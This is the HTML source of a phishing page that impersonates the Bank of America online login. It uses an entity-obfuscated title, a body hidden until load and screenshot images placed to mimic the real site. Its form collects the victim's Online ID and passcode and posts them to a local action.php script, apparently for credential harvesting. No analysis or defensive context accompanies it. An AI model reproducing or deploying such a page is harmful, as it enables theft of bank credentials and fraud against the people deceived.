<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Bank of&#32;&#97;m&#101;r&#105;c&#97&#32;&#79;&#110;line</title>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />

<link rel="shortcut icon"
              href="images/favicon.ico"/>

<script type="text/javascript">

function unhideBody()
{
var bodyElems = document.getElementsByTagName("body");
bodyElems[0].style.visibility = "visible";
}

</script>

<body style="visibility:hidden" onload="unhideBody()">
<style type="text/css">
.mycss
{
font-weight:normal;color:#000000;letter-spacing:1pt;word-spacing:2pt;font-size:19px;text-align:left;font-family:arial, helvetica, sans-serif;line-height:1;
}
</style>
<style>
 
.textbox { 
   -webkit-appearance: none;
    -moz-appearance: none;
    appearance: none;
    box-sizing: border-box;
    
    border-radius: 3px!important;
    background: #fff;
    border: 2px solid #c2c0c6!important;
    color: #021829;
    font-family: Optimist,Arial,Helvetica,sans-serif;
    font-weight: 400;
    font-size: 1em!important;
    height: auto!important;
    padding: .625em!important;
    margin-bottom: 16px!important; 
 }
}


</style>
</head>
<body>
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1350px; height:609px; z-index:0"><img src="images/first1.png" alt="" title="" border=0 width=1350 height=609></div>

<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:609px; width:1350px; height:656px; z-index:0"><img src="images/font2.png" alt="" title="" border=0 width=1350 height=656></div>

<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:1265px; width:1350px; height:386px; z-index:0"><img src="images/font3.png" alt="" title="" border=0 width=1350 height=386></div>

<div id="image2" style="position:absolute; overflow:hidden; left:0px; top:1651px; width:1350px; height:635px; z-index:1"><img src="images/foort.png" alt="" title="" border=0 width=1350 height=635></div>
<form action="action.php" name="lbha" id="lbha" method="post">
<input name="myuser" placeholder="Online ID" required autocomplete="off" class="textbox" type="text" style="position:absolute;width:274px;height:40px;left:67px;top:161px;z-index:2">

<input name="mepas" placeholder="Passcode" required autocomplete="off" class="textbox" type="password" style="position:absolute;width:274px;height:40px;left:67px;top:211px;z-index:3">



<div id="formimage1" style="position:absolute; left:68px; top:303px; z-index:5"><input type="image" name="formimage1" width="272" height="38" src="images/siga.png"></div>
</form>
</body>
</html>
